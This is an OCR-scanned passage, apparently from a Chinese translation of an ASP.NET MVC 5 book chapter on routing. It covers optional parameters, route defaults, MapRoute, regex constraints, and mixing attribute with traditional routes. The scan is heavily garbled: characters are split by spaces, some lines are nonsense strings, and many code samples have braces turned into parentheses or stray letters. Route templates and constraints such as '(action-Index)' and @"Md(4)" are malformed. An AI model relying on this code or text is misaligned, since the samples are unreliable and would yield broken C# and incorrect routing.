除了 提供 默认 值 ， 也 可 以 让 一 个 路 由 参数 变 为 可 选 参 数 。 控 制 器 中 管理 记录 表 的 部 分 代码 


如 下 : 


[RoutePrefix("contacts")] 
public class ContactsController : Controller 


{ 


} 


[Route ("index")] 

public ActionResult Index() 

{ 
// Show a list of contacts 
return View(); 

) 


[Route ("details/(id)")] 

public ActionResult Details(int id) 

{ 
// Show the details for the contact with this id 
return View(); 

) 


[Route ("update/(id)")] 

public ActionResult Update (int id) 

t 
// Display a form to update the contact with this id 
return View(); 

H 


[Route ("delete/(id)")] 

public ActionResult Delete(int id) 

t 
// Delete the contact with this id 
return View(); 

E 


大 多 数 操作 接受 一 个 id 参数 ， 但 并 不 是 所 有 的 操作 都 如 此 。 我 们 没有 为 这 些 操作 使 用 单独 的 
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[RoutePrefix ("contacts")] 
[Route (" (action)/(id?)")] 
public class ContactsController : Controller 


t 
public ActionResult Index() 


t 
// Show a list of contacts 
return View(); 


) 


public ActionResult Details(int id) 

LI 
// Show the details for the contact with this id 
return View(); 

) 


public ActionResult Update (int id) 


t 
// Display a form to update the contact with this id 


return View(); 
) 


public ActionResult Delete(int id) 
{ 
// Delete the contact with this id 
return View(); 
) 
) 


我 们 可 以 提供 多 个 默认 值 或 可 选 值 。 下 列 代 码 段 中 也 为 {action} 参 数 提供 了 一 个 默认 值 : 
[Route (" (action-Index)/(id?)")] 


本 例 为 URL 中 的 {action} 参 数 提供 默认 值 。 虽 然 contacts' faction} 的 URI 模式 通常 只 要 求 匹配 含 
有 两 个 段 的 URL, 但 是 通过 为 第 二 个 参数 提供 默认 值 , 它 就 不 再 要 求 匹配 的 URL 必 须 包含 两 个 段 ， 
要 匹配 的 URL 也 可 能 只 包含 一 个 /contacts 参 数 ， 而 省 略 了 {action} 参 数 。 在 这 种 情况 下 ，{action} 
的 值 是 通过 默认 值 提供 的 ， 而 不 是 通过 传 入 的 URL。 

可 选 路 由 参数 是 默认 值 的 特例 。 从 路 由 的 角度 看 ， 将 参数 标记 为 可 选 参数 与 列 出 参数 的 默认 
值 之 间 并 没有 太 大 区 别 ;在 这 两 种 情况 中 ， 路 由 实际 上 都 有 一 个 默认 值 。 可 选 参数 只 是 有 一 个 特 
殊 的 默认 值 UrlParameter Optional。 


注意 除了 让 id 可 选 ， 还 可 以 通过 将 id 的 默认 值 设置 为 空 串 {id =} 来 让 路 由 匹配 。 这 
种 方法 有 什么 不 同 呢 ? 

还 记得 我 们 前 面 提 到 的 ， 框 架 会 从 URL 中 解析 出 路 由 参数 的 值 并 将 解析 后 的 内 
容 放 入 一 个 字典 中 吗 ? 当 我 们 把 一 个 参数 标记 为 可 选 ， 并 且 在 URL 中 并 没有 提供 值 


时 ， 路 由 就 不 在 字典 中 添加 条 目 。 如 果 该 默认 值 被 设置 为 空 串 ， 那 么 路 由 值 字典 将 
添加 一 个 键 ， 它 的 名 称 为 “qd"， 对 应 的 条 目 为 空 事 。 在 一 些 场合 中 ， 这 种 差别 是 很 
重要 的 。 它 可 以 让 我 们 知道 id 值 没有 被 指定 和 指定 为 空 的 区 别 。 
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需要 注意 的 是 ， 默 认 值 (或 可 选 参数 ) 相 对 于 其 他 路 由 参数 的 位 置 非常 重要 。 例 如 ， 假 设 存在 
URI 模式 contacts/faction}/fid}， 如 果 我 们 只 为 faction} 参 数 提供 默认 值 ， 而 没有 为 fid} 参 数 指定 默 
认 值 ， 那 么 效果 与 不 给 [action} 参 数 提供 默认 值 是 一 样 的。 尽管 路 由 允许 有 这 样 的 路 由 ， 但 这 样 提 
供 默认 值 ， 路 由 不 是 非常 有 用 。 为 什么 会 这 样 ? 

下 面 简单 的 例子 将 会 使 答案 一 目 了 然 。 假 设 定义 了 下 面 两 个 路 由 ， 第 一 个 路 由 为 faction} 参 
数 设 定 了 默认 值 : 

[Route ("contacts/{action=Index}/{id}")] 

[Route ("contacts/{action}/{id?}")] 

现在 , 如 果 传 入 一 个 URI 为 /contacts/bob 的 请 求 , 那么 上 面 哪 一 个 路 由 将 与 之 匹配 呢 ? 由 于 第 
一 个 路 由 为 {action} 参 数 提供 了 默认 值 ， 因 此 第 一 个 路 由 会 匹配 该 URL， 所 以 {id} 参 数值 应 该 是 
“bob”， 是 这 样 吗 ? 或 者 ， 它 与 第 二 个 路 由 相 匹 配 ， 将 参数 {action} 设 置 为 “bob”， 对 吗 ? 

本 例 的 问题 在 于 选择 匹配 路 由 时 出 现 了 二 义 性 。 为 避免 这 种 二 义 性 ， 只 有 为 当前 参数 后 面 的 
每 个 参数 也 定义 一 个 默认 值 时 (包括 使 用 了 默认 值 UrlParameter.Optional 的 可 选 参 数 )， 路 由 引擎 才 
能 使 用 当前 参数 的 默认 值 。 在 本 例 中 ， 如 果 为 {action} 参 数 定义 了 默认 值 ， 就 也 应 该 为 {id} 参 数 定 
义 默 认 值 (或 使 其 成 为 可 选 参 数 )。 
如 果 URI 段 中 含有 字面 值 , 那么 路 由 解释 默认 值 的 方式 会 稍 有 不 同 。 假 设 有 如 下 定义 的 路 由 : 


[Route ("{action}-{id?}")] 


注意 ， 参 数 {action} 和 {id?} 之 间 存在 一 个 字符 串 字 面值 (-)。 显 而 易 见 ，URI 为 /details-1 的 请 求 
将 会 与 该 路 由 匹配 ， 但 是 URI 为 /details- 的 请 求 是 否 也 能 与 其 匹配 呢 ? 可 能 不 会 ， 因 为 这 样 会 生成 
ARFÜEEBJURL. 

原来 ， 任 何 带 有 字面 值 的 URIL 段 (在 两 个 斜 杠 之 间 的 URL 部 分 ) 在 匹配 请 求 URL 时 ， 每 个 路 由 
参数 值 都 必须 匹配 。 本 例 中 的 默认 值 在 生成 URL 时 才 开 始 起 作用 ， 本 章 后 面 的 9.3 节 将 会 介绍 该 
内 容 。 


9.24 定义 传统 路 由 


在 创建 第 一 个 特性 路 由 前 ,我 们 简单 地 看 了 看 ~/App_Star/RouteConfig.cs 文 件 中 的 
RegisterRoutes 方 法 。 到 目前 为 止 ， 该 方法 中 只 有 一 行 代码 ， 用 于 启用 特性 路 由 。 现 在 我 们 将 更 仔 
细 地 看 看 这 个 方法 。RegisterRoutes 是 集中 配置 路 由 的 地 方 ， 传 统 路 由 就 放 在 该 方法 中 。 

现在 我 们 把 讨论 集中 到 传统 路 由 上 ， 所 以 删除 该 方法 中 对 特性 路 由 的 引用 。 后 面 我 们 将 把 这 
两 种 方法 结合 起 来 。 但 是 现在 ， 清 除 RegisterRoutes 方 法 中 的 路 由 ， 然 后 添加 一 个 非常 简单 的 传统 
路 由 。 添 加 后 ，RegisterRoutes 方 法 的 代码 如 下 所 示 : 

public static void RegisterRoutes (RouteCollection routes) 

{ 


routes.MapRoute ("simple", "(first)/(second)/(third)"); 
} 


路 由 的 单元 测试 


我 们 没有 在 Application_Start 方 法 中 将 路 由 直接 添加 到 RouteTable， 而 是 把 用 来 添加 路 由 的 默 
认 模 板 代码 移入 了 单独 的 一 个 静态 方法 RgisterRoutes 中 ， 以 便 为 路 由 编写 单元 测试 。 这 样 一 来 ， 
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使 用 Globalasax.cs 中 定义 的 路 由 填充 RouteCollection 的 局 部 实例 就 很 容易 。 只 需 在 单元 测试 方法 中 
编写 下 面 的 代码 : 


var routes = new RouteCollection(); 
RouteConfig.RegisterRoutes (routes); 


//Write tests to verify your routes here... 


但 是 , 这 种 方法 与 特性 路 由 不 能 很 好 地 结合 起 来 (特性 路 由 需要 找到 控制 器 类 和 操作 方法 来 定 
位 它们 的 路 由 特性 ， 这 个 过 程 被 设计 为 只 有 在 ASPNET 站 点 内 调用 MapMvcAttributeRoutes 方 法 时 
才能 工作 )。 为 了 绕 过 这 种 限制 ， 可 以 将 MapMvcAttributeRoutes 放 在 要 进行 单元 测试 的 方法 之 外 。 
可 以 像 下 面 这 样 定义 RegisterRoutes: 
public static void RegisterRoutes (RouteCollection routes) 
t 
routes.MapMvcAttributeRoutes|(); 


RegisterTraditionalRoutes (routes); 
) 


public static void RegisterTraditionalRoutes (RouteCollection routes) 
t 

routes.MapRoute ("simple", "(first)/(second)/(third)"); 
} 


然后 , 让 单元 测试 调用 RouteConfig RegisterTraditionalRoutes, 而 不 是 RouteConfig RegisterRoutes。 
第 14 章 的 14.3.2 节 “路 由 测试 ”中 将 详细 解释 路 由 的 单元 测试 。 


MapRoute 方 法 的 最 简单 形式 是 采用 路 由 名 称 和 路 由 模板 。 路 由 名 称 会 在 后 面 介绍 。 现 在 主要 
讨论 路 由 模板 。 

与 特性 路 由 一 样 ， 路 由 模板 是 一 种 模式 匹配 规则 ， 用 来 决定 该 路 由 是 否 应 该 处 理 传 入 的 请 求 
(基于 请 求 的 URL 决 定 )。 特 性 路 由 与 传统 路 由 之 间 最 大 的 区 别 在 于 如 何 将 路 由 链接 到 操作 方法 。 
传统 路 由 依赖 于 名 称 字符 串 而 不 是 特性 来 完成 这 种 链接 。 

在 操作 方法 上 使 用 特性 路 由 时 ， 不 需要 任何 参数 ， 路 由 就 可 以 工作 。 路 由 特性 被 直接 放 到 了 
操作 方法 上 ， 当 路 由 匹配 时 , MVC 知 道 去 运行 该 操作 方法 。 将 特性 路 由 放 到 控制 器 类 上 时 , MVC 
知道 使 用 哪个 类 (因为 该 类 上 有 路 由 特性 )， 但 是 不 知道 运行 哪个 方法 ， 所 以 我 们 使 用 特殊 的 action 
参数 来 通过 名 称 指明 要 运行 的 方法 。 

如 果 针 对 上 面 的 简单 路 由 请 求 一 个 URL( 例 如 /a/b/c), 会 收 到 一 个 500 错 误 。 这 是 因为 ,传统 路 
由 不 会 自动 链接 控制 器 或 操作 。 要 指定 操作 ， 需 要 使 用 action 参 数 (就 像 在 控制 器 类 上 使 用 路 由 特 
性 时 所 做 的 那样 )。 要 指定 控制 器 ， 需 要 使 用 一 个 新 参数 controller。 如 果 不 定 义 这 些 参 数 ，MVC 
不 会 知道 我 们 想 要 运行 的 操作 方法 ， 所 以 会 通过 返回 一 个 500 错 误 告诉 我 们 存在 这 样 的 问题 。 

通过 修改 简单 路 由 ， 使 其 包含 这 些 必需 参数 ， 可 以 解决 这 个 问题 : 

routes.MapRoute ("simple", "{controller}/{action}"); 
现在 , 如 果 请 求 一 个 URL, 如 /home/index, MVC 会 认为 这 是 在 请 求 一 个 名 为 home 的 {controller} 


和 一 个 名 为 index 的 {faction} 。 根 据 约定 ，MVC 会 把 后 缀 Controller 浴 加 到 {controller} 路 由 参数 的 值 
上 ， 并 尝试 定位 具有 该 名 称 (区 分 大 小 写 ) 并 实现 了 System Web.Mvc.IController 接 口 的 类 型 。 


注意 ”特性 路 由 直接 绑 定 到 方法 和 控制 器 ， 而 不 是 仅 指定 名 称 ， 这 意味 着 它们 
更 加 精确 。 例 如 ， 使 用 特性 路 由 时 ， 可 以 随意 命名 控制 器 类 ， 只 要 以 Controller 后 组 
结尾 即 可 (名 称 不 需要 与 URL 相 关 )。 在 操作 方法 上 直接 使 用 特性 ， 意 味 着 MVC 知 道 
运行 哪个 重 载 版 本 ， 并 不 需要 在 同名 的 多 个 操作 方法 中 选择 。 


1. 路 由 值 


controller 和 action 参 数 很 特殊 ， 因 为 它们 映射 到 控制 器 和 操作 的 名 称 ， 是 必需 参数 。 但 是 这 两 
个 参数 并 不 是 路 由 可 以 使 用 的 全 部 参数 。 更 新 路 由 来 包含 第 三 个 参数 : 


routes.MapRoute ("simple", "{controller}/{action}/{id}"); 


再 次 查看 表 9-1 中 的 示例 , 并 把 它们 应 用 于 更 新 后 的 路 由 , 我 们 可 发 现 /albums/ display/123 请 求 
现在 变 成 了 请 求 名 为 “albums” 的 {controller}。ASPNET MVC 框 架 将 把 Controller 后 级 添加 到 URL 
{controller} 参 数值 的 后 面 , 从 而 得 到 类 型 名 称 AlbumsController。 如 果 存在 一 个 与 其 相同 的 类 型 名 称 ， 
并 且 该 类 型 还 实现 了 IController 接 口 ， 那 么 该 类 型 就 会 被 实例 化 ， 并 用 于 处 理 当 前 这 个 请 求 。 

下 面 继 续 /albums/display/123 示 例 ， 接 下 来 ，ASPNET MVC 将 调用 AlbumsController 控 制 器 的 
Display 方 法 。 

注意 ， 尽 管 表 9-1 中 的 第 三 个 URL 是 一 个 有 效 的 路 由 URL， 但 是 它 不 能 匹配 任何 控制 器 和 操 
作 ， 因 为 它 要 尝试 实例 化 一 个 名 为 abController 的 控制 器 ,尝试 调用 一 个 名 为 c-d 的 方法 ， 显然 二 者 
都 不 是 有 效 的 方法 名 称 。 

除 {controller} 和 {action} 外 ， 如 果 还 有 其 他 任何 路 由 参数 ， 它 们 都 可 以 作为 参数 传递 到 操作 方 
法 中 。 例 如 ， 假 设 存 在 如 下 控制 器 : 


public class AlbumsController : Controller 
t 
public ActionResult Display(int id) 
{ 
//Do something 
return View(); 
) 


) 


那么 对 /albums/display/123 的 请 求 会 导致 MVC 实 例 化 该 类 , 并 调用 其 中 的 Display 方 法 , 同时 将 
123 传 递 给 Display 方 法 的 参数 id。 

在 前 面 的 示例 中 ， 我 们 用 到 了 路 由 URL {controller}/{action}/{id}。 其 中 的 每 一 个 段 包含 了 一 
个 路 由 参数 ， 同 时 路 由 参数 也 占有 对 应 的 整个 段 。 事 实 上 ， 并 不 一 定 总 是 这 样 。 路 由 URL 在 段 中 
也 允许 包含 字面 值 ， 这 和 特性 路 由 一 样 。 例 如 ， 我 们 可 能 会 把 MVC 集 成 到 一 个 现 有 站 点 中 ,并 且 
想 让 所 有 MVC 请 求 以 site 开 头 ， 可 以 参照 下 面 的 代码 来 实现 : 

site/{controller}/{action}/{id} 

Li ER H RHN RURLIJ E — ARRA sitek, ARES WSRAAN. KE, EERI H 
可 以 匹配 /site/albums/display/123， 而 不 能 匹配 /albums/display/123。 
此 外 ， 还 有 更 灵活 的 路 由 语法 规则 : 在 路 径 段 中 允许 字面 值 和 路 由 参数 混合 在 一 起 。 它 仅 有 
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的 限制 就 是 不 允许 有 两 个 连续 的 路 由 参数 。 所 以 下 面 的 两 个 示例 : 


(1anguage)-(country)/(controller]/(action] 
(controller). {action}. {id} 


都 是 有 效 的 路 由 URL， 但 是 : 
(controller) (action)/(id) 
不 是 有 效 的 路 由 ， 因 为 这 样 的 话 ， 路 由 将 无 法 知道 传 入 请 求 URI 的 控制 器 部 分 何 时 结束 ， 操 


作 部 分 何 时 开始 。 
下 面 看 一 些 其 他 示例 (如 表 9-3 所 示 )， 它 们 可 以 帮助 我 们 理解 URLI 模式 匹配 的 机 理 。 


表 9-3 ”路 由 URL 模 式 及 其 匹配 示例 


路 由 URL 模 式 匹配 的 URL 示 例 
{controller}/ {action}/ {genre} /albums/list/rock 
service/ (action) - (format j /service/display-xml 
{report}/ {year}/ (month]/ (day) /sales/2008/1/23 


只 需要 记 住 ， 除 非 路 由 提供 了 controller 和 action 参 数 ， 否 则 MVC 不 知道 为 URIL 运 行 哪些 代码 。 
在 后 面 讨论 默认 值 时 ,会 看 到 有 一 种 方法 可 以 向 MVC 提 供 这 些 参数 ， 而 不 需要 在 路 由 模板 中 包含 


2. 路 由 默认 值 


至 此 ， 对 MapRoute 的 调用 关注 于 在 定义 的 路 由 中 包含 匹配 URL 的 URI 模 式 。 事 实证 明 ， 与 
特性 路 由 一 样 ， 路 由 URL 并 不 是 在 匹配 请 求 时 所 要 考虑 的 唯一 因素 。 我 们 也 可 以 为 路 由 参数 
提供 默认 值 。 假 设 现在 有 一 个 没有 任何 参数 的 操作 方法 ， 如 下 面 的 代码 所 示 : 


public class AlbumsController : Controller 


{ 
public ActionResult List() 


t 
//Do something 
return View(); 


} 
) 


我 们 会 很 自然 地 想到 通过 下 面 的 URL 调用 List 方 法 : 

/albums/list 

然而 , 根据 前 面 代码 段 定义 的 路 由 URL, HIl (controller?/ (actionY/ (id) 这 段 代 码 不 能 正常 运行 ， 
因为 前 面 定义 的 路 由 只 匹配 包含 三 个 段 的 URL， 但 是 /albums/list 只 包含 两 个 段 。 
使 用 特性 路 由 时 ， 通 过 在 路 由 模板 中 将 {id} 参 数 内 联 修改 为 {id?}， 可 使 其 成 为 可 选 参 数 。 传 
统 路 由 则 采用 了 一 种 不 同 的 方法 。 传 统 路 由 没有 把 这 些 信息 作为 路 由 模板 的 一 部 分 ， 而 是 放 到 了 
路 由 模板 后 面 的 单独 一 个 参数 中 。 要 在 传统 路 由 中 让 {id} 成 为 可 选 参数 ， 可 以 像 下 面 这 样 定义 
路 由 : 


224 


routes.MapRoute ("simple", "(controller)/(action]/(id)", 
new (id = UrlParameter.Optional]); 


MapRonute 的 第 三 个 参数 用 于 默认 值 。{id= UrlParameter Optional} 这 段 代 码 为 fid} 参 数 定义 了 
默认 值 。 与 特性 路 由 不 同 ， 这 里 可 选 值 与 默认 值 之 间 的 关系 很 明显 。 可 选 参数 就 是 具有 特殊 默认 
值 UrlParameterOptional 的 参数 ， 传 统 路 由 定义 中 正 是 使 用 这 种 方法 来 定义 可 选 参数 的 。 
现在 , 框架 允许 使 用 URL /albums/list 来 调用 List 操 作 方法 , 这 可 以 实现 我 们 的 目标 。 与 特性 路 
由 中 一 样 ， 还 可 以 为 多 个 参数 提供 默认 值 。 下 面 的 代码 段 中 演示 了 为 {action} 参 数 提供 默认 值 : 

routes.MapRoute ("simple", 


"(controller)/(action)/(id)", 
new ( id = UrlParameter.Optional, action = "index" }); 


注意 我 们 使 用 简明 的 语法 来 定义 字典 。MapRoute 方 法 在 底层 把 新 的 { id = 
UrlParameter.Optional, action = "index" } 转 换 成 RouteValueDictionary 的 一 个 实例 , 这 一 
问题 稍 后 会 进行 讨论 。 字 典 的 键 是 "id" 和 "action"， 它 们 的 对 应 值 分 别 是 
UrlParameter.Optional 和 "index"。 该 语法 可 以 把 对 象 的 属性 名 作为 键 ， 把 对 应 的 属性 
值 作为 值 ， 构 建 对 象 ， 并 把 构建 的 对 象 加 入 字典 中 。 示例 中 我 们 使 用 的 具体 语法 是 ， 
使 用 对 象 初始 化 语法 创建 匿名 类 型 。 虽然 这 样 一 开始 可 能 会 感觉 有 些 不 自然 ， 但 是 
我 们 慢 慢 就 会 变 得 喜欢 它 的 简明 性 。 


如 果 使 用 的 是 特性 路 由 ， 则 会 使 用 语法 {action=Index} 内 联 提 供 默认 值 。 这 里 传统 路 由 再 次 使 
用 了 不 同 的 风格 。 我 们 在 单独 的 参数 中 分 别 指定 了 默认 值 和 可 选 值 ， 这 些 参数 专用 于 此 目的 。 

本 例 通过 Route 类 的 Defaults 字 典 属性 ， 为 URL 中 的 {action} 参数 提供 默认 值 。 虽 然 
{controller}/{action} 的 URL 模 式 通 常 只 要 求 匹配 含有 两 个 段 的 URL, 但 是 通过 为 第 二 个 参数 提供 默 
认 值 ， 它 就 不 再 要 求 匹配 的 URL 必 须 包 含 两 个 段 ， 要 匹配 的 URL 也 可 能 只 包含 {controller} 参 数 ， 
而 省 略 了 {action} 参 数 。 在 这 种 情况 下 , {action} 的 值 是 通过 默认 值 提供 的 , 而 不 是 通过 传 入 的 URL。 
虽然 与 特性 路 由 的 语法 不 同 ， 但 是 默认 值 提供 的 功能 是 相同 的 。 

下 面 回顾 一 下 前 面 关于 路 由 URI 模 式 及 其 匹配 内 容 的 表 9-3， 并 把 路 由 默认 值 添加 进去 ， 如 
下 例 所 示 : 

routes.MapRoute ("defaultsl", 


"(controller)/([(action)/(id])", 
new (id - UrlParameter.Optional]); 


routes.MapRoute ("defaults2", 
"(controller]/([(action]/[(id]", 
new (controller = "home", 
action = "index", 
id = UrlParameter.Optional]); 


defaults1 路 由 匹配 下 面 的 URL: 


/albums/display/123 
/albums/display 


defaults2 路 由 匹配 下 面 的 URL: 


225 


226 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


/albums/display/123 
/albums/display 
/albums 


/ 


默认 值 甚至 允许 映射 在 路 由 模板 中 根本 不 包含 controller 或 action 参 数 的 URL。 例如， 下 面 的 路 
由 完全 没有 参数 ，controller 和 action 参 数 由 MVC 使 用 默认 值 提供 : 
routes.MapRoute ("static", 


"welcome", 
new ( controller = "Home", action = "index" }); 


与 特性 路 由 一 样 ， 需 要 注意 的 是 ， 默 认 值 相对 于 其 他 路 由 参数 的 位 置 非常 重要 。 例 如 ， 假 设 
存在 URIL 模 式 {controller}/{action}/{id}, 如 果 我 们 只 为 {action} 参 数 指定 默认 值 , 而 没有 为 {id} 参 数 
指定 默认 值 ， 那 么 效果 与 不 给 {action} 参 数 提供 默认 值 是 一 样 的 。 除 非 两 个 参数 都 有 默认 值 ， 否 则 
会 存在 潜在 的 二 义 性 ， 路 由 因而 将 忽略 {action} 参 数 的 默认 值 。 当 为 一 个 参数 指定 默认 值 时 , 确保 
也 为 该 参数 后 面 的 所 有 参数 指定 默认 值 ， 否 则 默认 值 将 被 忽略 。 本 例 中 的 默认 值 在 生成 URL 时 才 
开始 起 作用 ， 本 章 后 面 的 9.3 节 将 会 介绍 该 内 容 。 


3. 路 由 约束 


有 时 ， 相 对 于 指定 URL 段 的 数量 来 说 ， 我 们 需要 对 URL 有 更 多 的 控制 。 例 如 下 面 两 个 URL: 

e http://example.com/2008/01/23/ 

e http://example.com/posts/categories/aspnetmvc/ 

显而易见 ， 上 面 两 个 URL 都 包含 3 个 段 ， 并 且 都 可 以 和 本 章 前 面 所 示 的 简单 传统 路 由 相 匹 配 。 
如 果 我 们 不 小 心 ， 就 会 使 系统 查找 一 个 名 为 2008Controller 的 控制 器 和 一 个 名 为 01 的 方法 ! 显然 这 
是 很 荒唐 的 ， 然 而 ， 仅 通过 查看 这 些 URL， 我 们 如 何 才能 知道 它们 应 该 映射 到 哪些 内 容 呢 ? 

这 正 是 约束 的 用 武之 地 。 约 束 允许 路 径 段 使 用 正则 表达 式 来 限制 路 由 是 否 匹配 请 求 。 在 特性 
路 由 中 ， 使 用 类 似 于 {id:int} 的 语法 在 路 由 模板 中 内 联 指定 约束 。 这 里 ， 传 统 路 由 仍然 采用 了 一 种 
不 同 的 方法 。 传 统 路 由 使 用 单独 的 一 个 参数 ， 而 不 是 内 联 包含 约束 信息 。 例 如 : 

routes.MapRoute ("blog", "(year]/(month)/(day])", 


new ( controller = "blog", action = "index" ], 
new ( year = G"Md(4)", month = @"\d{2}", day = @"\d{2}" )); 


routes.MapRoute ("simple", "(controller)/(action)/(id)"); 


在 上 面 的 代码 段 中 ， 第 一 个 路 由 包含 3 个 路 由 参数 ，{year}、{month} 和 {day}。 其 中 的 每 个 参 
数 映射 到 由 匿名 对 象 初始 化 器 指定 的 约束 字典 中 的 相应 约束 : {year = @"d{4}", month = @"d{2}", 
day = @"d{2}"}。 从 中 可 以 看 出 ， 是 约束 字典 的 键 映射 到 路 由 的 路 由 参数 。 因 此 ， 对 于 {year} 段 
的 约束 是 一 个 只 能 匹配 包含 4 个 数字 的 字符 串 的 正则 表达 式 ， 即 \d{4}。 

上 面 使 用 的 正则 表达 式 的 格式 与 NET Framework 的 Regex 类 所 使 用 的 格式 相同 ， 事 实 上， 在 
路 由 的 底层 使 用 的 就 是 Regex 类 。 如 果 一 个 路 由 的 任何 约束 都 不 能 匹配 请 求 URL， 那 么 该 路 由 就 
不 能 匹配 传 入 的 请 求 ， 此 时 路 由 机 制 会 移 向 下 一 个 路 由 继续 匹配 。 

如 果 熟 悉 正 则 表达 式 的 语法 规则 , 可 以 知道 d{4} 实 际 上 匹配 包含 4 个 连续 数字 的 任何 字符 串 
比如 “abc1234def”。 
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然而 ， 路 由 机 制 会 自动 使 用 “^” 和 “$” 符 号 包装 指定 的 约束 表达 式 ， 以 确保 表达 式 能 够 精 
确 地 匹配 参数 值 。 换 言 之 ， 在 本 例 中 真正 使 用 的 正则 表达 式 是 “^\d{4}$”， 而 不 是 \d{4}， 以 确保 
只 能 匹配 参数 值 “1234”， 而 不 能 匹配 “abc1234def”。 


注意 特性 路 由 的 正则 表达 式 的 匹配 行为 与 传统 路 由 相反 。 传 统 路 由 总 是 进行 
精确 匹配 , 而 特性 路 由 的 regex 内 联 约束 支持 部 分 匹配 . 传统 路 由 约束 year = @"d{4}" 
相当 于 特性 路 由 内 联 约束 {yearTregex(^\d{4}$)}。 在 特性 路 由 中 ， 如 果 想 要 进行 精确 
匹配 ， 必 须 显 式 包含 ^ 和 9$ 字 符 。 传 统 路 由 总 是 会 蔡 我 们 添加 这 些 字符 ， 不 编写 自 定 
义 约束 ， 是 无 法 进行 部 分 匹配 的 。 我 们 通常 进行 的 是 精确 字符 串 匹配 ， 所 以 传统 路 
由 语法 意味 着 我 们 不 会 意外 忘记 这 点 细节 。 将 regex 约 束 在 传统 路 由 和 特性 路 由 之 间 
移动 时 ， 要 知道 这 种 区 别 。 


因此 在 上 述 代码 片段 中 定义 的 第 一 个 路 由 能 够 匹配 /2008/05/25， 而 不 能 匹配 /08/05/25， 因 为 
08 不 能 与 正则 表达 式 \d{4} 相 匹配 ， 所 以 它 不 能 满足 year 参 数 的 约束 。 


O 注意 ”我们 是 在 默认 的 simple 路 由 之 前 添加 的 新 路 由 ; 路 由 会 按 先后 顺序 与 传 
入 的 URL 进 行 匹 配 ， 直 到 匹配 成 功 (如 果 存 在 匹配 路 由 的 话 )。 因 为 URI 为 /2008/06/07 
| 的 请 求 将 与 两 个 定义 的 路 由 都 匹配 ， 所 以 我 们 把 更 具体 的 路 由 放 在 了 前 面 。 


默认 情况 下 ， 传 统 路 由 约束 使 用 正则 表达 式 字 符 串 来 执行 请 求 URL 的 匹配 ， 但 是 稍 加 留意 ， 
就 会 发 现 约束 字典 是 实现 了 IDictionary<string，object> 接 口 的 RouteValueDictionary 类 型 对 象 。 这 意 
味 着 字典 中 的 值 是 Object 类 型 ， 而 不 是 String 类 型 。 这 就 为 传递 约束 值 提供 了 灵活 性 。 特 性 路 由 提 
供 了 大 量 内 置 的 内 联 约束 ， 但 是 只 能 使 用 路 由 模板 字符 串 。 这 意味 着 在 特性 路 由 中 ， 没 有 什么 简 
单 的 方法 来 提供 自 定义 约束 对 象 。 当 约束 是 字符 串 时 ， 传 统 路 由 把 它们 当成 正则 表达 式 ， 但 是 当 
需要 使 用 一 种 不 同 的 约束 时 ,传递 男 外 一 个 约束 对 象 是 很 容易 的 。 后 面 的 第 9.5 节 会 介绍 如 何 利用 
这 一 特性 。 


4. 结合 使 用 特性 路 由 和 传统 路 由 


现在 已 经 介绍 完了 特性 路 由 和 传统 路 由 。 二 者 均 支 持 路 由 模板 、 约 束 、 可 选 值 和 默认 值 。 它 
们 的 语法 略 有 不 同 ， 但 是 提供 的 功能 基本 上 相同 ， 因 为 它们 在 底层 使 用 相同 的 路 由 系统 。 

我 们 可 以 选择 使 用 特性 路 由 或 传统 路 由 ， 也 可 以 结合 使 用 这 两 种 方法 。 要 使 用 特性 路 由 ， 需 
要 在 RegisterRoutes 方 法 (传统 路 由 包含 在 这 个 方法 中 ) 中 添加 下 面 这 行 代码 : 


routes.MapMvcAttributeRoutes(); 


[以 把 这 行 代码 看 成 添加 了 一 个 超级 路 由 ， 其 中 包含 了 所 有 的 路 由 特性 。 与 其 他 路 由 一 样 ， 
这 个 超级 路 由 相对 于 其 他 路 由 的 位 置 很 重要 。 路 由 系统 按 顺 序 检查 每 个 路 由 ， 并 选择 第 一 个 匹配 
的 路 由 。 如 果 传统 路 由 和 特性 路 由 之 间 存 在 重 琶 ， 那 么 会 使 用 第 一 个 遇 到 的 路 由 。 在 实践 中 ， 笔 
者 建议 把 MapMvcAttributeRoutes 调 用 放 到 首位 。 特 性 路 由 通常 更 加 具体 ， 而 传统 路 由 更 加 宽泛 ， 
所 以 让 特性 路 由 首先 出 现 可 以 让 它们 具有 比 传统 路 由 更 高 的 优先 级 。 

假设 有 一 个 使 用 传统 路 由 的 应 用 程序 ， 想 要 在 其 中 添加 一 个 使 用 特性 路 由 的 新 控制 器 。 实 现 
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起 来 很 简单 : 


routes.MapMvcAttributeRoutes|(); 
routes.MapRoute ("simple", 
"([controller)/(action)/(id])", 
new ( action = "index", id = UrlParameter.Optional]); 


// Existing class 
public class HomeController : Controller 
t 
public ActionResult Index () 
{ 
return View(); 
} 


public ActionResult About () 
{ 

return View(); 
) 


public ActionResult Contact () 
{ 
return View(); 
) 
) 


[RoutePrefix("contacts")] 
[Route (" (action-Index)/(id?)")] 
public class NewContactsController : Controller 
t 
public ActionResult Index () 
{ 
// Do some work 
return View(); 
} 


public ActionResult Details(int id) 
t 

// Do some work 

return View(); 
} 


public ActionResult Update (int id) 
{ 

// Do some work 

return View(); 
H 


public ActionResult Delete(int id) 

t 
// Delete the contact with this id 
return View(); 
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92.5 选择 特性 路 由 还 是 传统 路 由 


我 们 应 该 选择 使 用 特性 路 由 还 是 传统 路 由 昵 ? 选择 哪 种 方法 都 很 合理 ， 不 过 下 面 还 是 对 什么 
时 候 使 用 哪 种 路 由 提供 了 一 些 建议 。 

对 于 以 下 情况 ， 考 虑 选择 传统 路 由 : 

。 想 要 集中 配置 所 有 路 由 。 

e 使 用 自 定义 约束 对 象 。 

e 存在 现 有 可 工作 的 应 用 程序 ， 而 又 不 想 修改 应 用 程序 。 

对 于 以 下 情况 ， 考 虑 选择 特性 路 由 : 

o 想 把 路 由 与 操作 代码 保存 在 一 起 。 

o 创建 新 应 用 程序 ， 或 者 对 现 有 应 用 程序 进行 巨大 修改 。 

传统 路 由 的 集中 配置 意味 着 可 以 在 一 个 地 方 理解 请 求 如 何 映射 到 操作 。 传 统 路 由 也 比特 性 路 
由 更 灵活 。 例 如 ， 向 传统 路 由 添加 自 定义 约束 对 象 很 容易 。C# 中 的 特性 只 支持 特定 类 型 的 参数 
对 于 特性 路 由 ， 这 意味 着 只 能 在 路 由 模板 字符 串 中 指定 约束 。 

另 一 方面 ， 特 性 路 由 很 好 地 把 关于 控制 器 的 所 有 内 容 放 到 了 一 起 ， 包 括 控制 器 使 用 的 URL 和 
